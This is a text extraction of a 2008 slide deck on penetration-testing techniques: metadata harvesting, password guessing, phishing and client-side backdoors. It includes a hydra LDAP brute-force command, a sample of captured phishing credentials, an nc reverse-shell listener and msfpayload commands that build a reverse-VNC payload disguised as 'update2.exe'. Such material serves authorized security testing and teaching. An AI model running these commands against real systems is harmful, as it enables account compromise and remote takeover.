Sunteți pe pagina 1din 44

Beyond Front-Line Exploits:

Tips and Tools for Comprehensive


Penetration Testing

Lenny Zeltser
Security Consultant, SAVVIS
Senior Faculty Member, SANS Institute
Handler, SANS Internet Storm Center

August 2008
Pen testing usually involves locating
and exploiting software bugs.

2
© 2008 Lenny Zeltser
Attack surface of many server
environments is very limited.

What if you couldn’t


exploit any software
vulnerabilities?

3
© 2008 Lenny Zeltser
Consider 4 techniques for going
beyond the front-line approach.

Data in plain sight Social engineering

Remote password- Client-side


guessing backdoors

4
#1: Data in plain sight

5
Google

site:example.com filetype:pdf

site:example.com filetype:ppt

site:example.com filetype:doc

6
© 2008 Lenny Zeltser
7
© 2008 Lenny Zeltser
libextractor

$ extract sample.pdf sample.ppt sample.doc

$ extract overview.ppt
paragraph count - 2
last saved by - Lenny Zeltser
title - Project overview
creation date - 2008-03-14T01:58:53Z
creator - John Smith
word count - 5
date - 2008-03-14T04:56:57Z
generator - Microsoft Office PowerPoint

8
© 2008 Lenny Zeltser
9
© 2008 Lenny Zeltser
Google + libextractor = Metagoofil

$ metagoofil.py -d example.com -f all -l 10 –o o.html –t o

$ metagoofil.py -d zeltser.com -f all -l 10 –o o.html –t o

[+] Searching in zeltser.com for: pdf


[+] Total results in google: 11
[ 1/11 ] http://www.zeltser.com/.../impersonation-attacks.pdf
[ 2/11 ] http://www.zeltser.com/.../multi-firewall.pdf
...

[+] Searching results: 0


[ 1/1 ] http://www.zeltser.com/.../malicious-agents.ppt

Usernames found:
================
Lenny Zeltser (www.zeltser.com)

10
© 2008 Lenny Zeltser
Finding documents via Maltego

11
© 2008 Lenny Zeltser
Finding interesting files via Maltego

12
© 2008 Lenny Zeltser
#2: Remote Password-Guessing

13
Potential usernames: ranked
word lists

http://www.census.gov/genealogy/names/names_files.html

Top Last Names Top Female First Top Male First


Names Names
smith mary james
johnson patricia john
williams linda robert
jones barbara michael
brown elizabeth william
davis jennifer david
miller maria richard

14
© 2008 Lenny Zeltser
Potential usernames: theHarvester

$ theHarvester.py -d example.com –l 3 -b google


direccion@example.com
jamesquieras@example.com
bob@example.com

$ theHarvester.py -d example.com –l 3 -b linkedin


Mark Jameson
James Quieras
Robert Marcus

$ theHarvester.py -d example.com –l 3 -b pgp


hoan@example.com
annegolden@example.com
marrie@s1.example.com

15
© 2008 Lenny Zeltser
Wrong username vs. password

16
© 2008 Lenny Zeltser
Confirm usernames with Brutus by
varying only usernames.

Many One

17
© 2008 Lenny Zeltser
A head-on brute-force password
attack will probably fail.

Create a short list of


potential passwords.

18
© 2008 Lenny Zeltser
Some common generic passwords

password baseball1 iloveyou querty1 soccer

password1 football1 iloveyou1 querty123 windows

abc123 123456 monkey bitch1 1qaz2wsx

123abc 123123 cookie123 flower gospel

fuckyou monkey1 miss4you 123qwe superman


1
fuckyou1 princess1 clumsy manager admin

19
© 2008 Lenny Zeltser
Best results with a company-
specific dictionary file

Briefly
Britain
British
brother
browser
Bugtraq
Bugbear
bundled

20
© 2008 Lenny Zeltser
Password recovery mechanisms are
weak links.

They often depend on security


of the email system.

21
© 2008 Lenny Zeltser
Also, “secret question” recovery is a
prime candidate for attack.

22
© 2008 Lenny Zeltser
Letting users select their own
questions is particularly weak.

23
© 2008 Lenny Zeltser
Use LDAP if you find it—much faster
authentication.

$ hydra -L users.txt –P passwords.txt ldap.example.com ldap2


Hydra v5.4 (c) 2006 by van Hauser / THC
Hydra (http://www.thc.org) 15 tasks, 26753 login tries
[DATA] attacking service ldap2 on port 389
[389][ldap] login: CN=Robert Marcus,OU=IT,O=ACME Example
password: Bugbear

$ k0ld –f users.txt -w passwords.txt -I -o out.txt -f 'cn=*'


-h ldap.example.com

24
© 2008 Lenny Zeltser
Brute-force Remote Desktop
credentials with TSGrinder.

25
© 2008 Lenny Zeltser
TSGrinder is slow, and requires an
older Remote Desktop client (v5).

26
© 2008 Lenny Zeltser
#3: Social engineering

27
Tricking employees to release
information works too well.

28
© 2008 Lenny Zeltser
Email phishing-style campaigns can
obtain logon credentials.

29
© 2008 Lenny Zeltser
ArGoSoft Mail Server Freeware
helps relay spoofed email.

30
© 2008 Lenny Zeltser
You can register a domain that
resembles that of the target.

http://www.domaintools.com/domain-typo

xeample.com
eaxmple.com
exampe.net
exapmle.com
eaxmple.com
wwwexample.co
m
exampel.com

31
© 2008 Lenny Zeltser
Too many users will give up their
logon credentials.

32
© 2008 Lenny Zeltser
The site can also capture client-side
details for follow-on attacks.

USER: jsmith
PASSWORD: plumlips
LOCAL IP: 192.168.2.144
REMOTE IP: 208.77.188.166
PORT: 61035
USER AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
PLUGINS: Move Media Player; QuickTime Plug-in 7.4.1;
Mozilla Default Plug-in; RealJukebox NS Plugin;
RealPlayer(tm) G2 LiveConnect-Enabled Plug-In (32-bit);
Shockwave Flash; Java(TM) Platform SE 6 U2;

33
© 2008 Lenny Zeltser
#4: Client-Side Backdoors

34
Keeping up with security patches on
laptops and desktops is hard.

35
© 2008 Lenny Zeltser
Tools such as Core Impact and
Metasploit help target client-side
vulnerabilities.

36
© 2008 Lenny Zeltser
It may be more effective just to ask
the user to install the backdoor.

37
© 2008 Lenny Zeltser
The backdoor can connect to the
attacking system via reverse-shell.

$ C:\attacker> nc -l -p 80
Microsoft Windows [Version 6.0.6000]
Copyright (c) 2006 Microsoft Corporation. All rights
reserved

C:\Windows\Temp> dir
...

38
© 2008 Lenny Zeltser
Metasploit can generate stand-alone
payloads. Example: Reverse-VNC.

$ msfpayload windows/vncinject/reverse_tcp LPORT=5544


LHOST=192.168.1.124 DisableCourtesyShell=True X >
update2.exe

Created by msfpayload (http://www.metasploit.com).


Payload: windows/vncinject/reverse_tcp
Length: 177
Options: LHOST=192.168.1.124,LPORT=5544,
DisableCourtesyShell=True

$ msfcli exploit/multi/handler LPORT=5544


PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.124
DisableCourtesyShell=True E

39
© 2008 Lenny Zeltser
Reverse-VNC can control a system
even if it is behind a firewall.

40
© 2008 Lenny Zeltser
A system compromise
is just a means to an end.

41
© 2008 Lenny Zeltser
Consider previous scenarios when
defining your rules of engagement.

42
© 2008 Lenny Zeltser
These approaches increase the
chances of a “successful” pen test.

Data in plain sight Social engineering

Remote password- Client-side


guessing backdoors

43
© 2008 Lenny Zeltser
Lenny Zeltser
www.zeltser.com

44
© 2008 Lenny Zeltser

S-ar putea să vă placă și